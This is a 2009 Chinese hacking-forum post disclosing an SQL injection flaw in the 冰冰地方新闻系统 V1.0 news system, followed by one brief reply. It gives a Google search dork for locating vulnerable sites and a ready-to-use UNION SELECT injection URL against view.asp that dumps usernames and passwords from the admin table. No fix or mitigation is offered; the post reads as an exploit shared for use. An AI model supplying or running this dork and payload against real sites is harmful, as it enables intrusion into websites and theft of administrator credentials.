标题:
【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞
[打印本页]
作者:
期待~~
时间:
2009-12-21 09:32
标题:
【分享】冰冰地方新闻系统V1.0存在SQL注入漏洞
冰冰地方新闻系统V1.0存在SQL注入漏洞
网络安全
Google:inurl:gn.asp?m=*
网络安全
注入发生在view.asp页面,打开网址后跳到view.asp这个页面,否则注入不成功。
网络安全
注入语句:http://www.***.cn/tongjiang/view.asp?n=161%20and%201=2%20union%20select%201,2,3,4,5,6,username,password,9,10,11,12,13,14,15%20from%20admin
网络安全
作者:
q1a2
时间:
2009-12-25 15:06
比较喜欢漏洞
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2